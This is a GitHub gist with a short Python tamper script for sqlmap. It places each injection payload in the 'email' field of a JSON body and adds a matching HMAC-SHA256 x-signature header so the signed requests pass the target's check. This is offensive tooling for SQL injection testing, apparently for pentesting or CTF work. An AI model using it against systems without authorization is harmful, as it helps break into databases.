Created
April 6, 2025 21:17
-
-
Save Wind010/8fe03685619636d9186f9b10901c46db to your computer and use it in GitHub Desktop.
Revisions
-
Wind010 created this gist
Apr 6, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,38 @@ #!/usr/bin/env python import hmac import hashlib import json from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL SECRET_KEY = b"YOUR_SECRET_KEY" def dependencies(): pass def tamper(payload, **kwargs): """ payload is the injection and not the json or full request. """ try: # We don't have access to the request so we workaround here. p = {"id": 1, "email": "*", "message": "some message"} f = p.copy() f['email'] = payload body = json.dumps(f, separators=(',', ':')) except: body=payload #print(f"DEBUG: {body}") signature = hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest() if "headers" not in kwargs: kwargs["headers"] = {} kwargs["headers"]["x-signature"] = "sha256=" + signature kwargs["headers"]["Content-Type"] = "application/json" return payload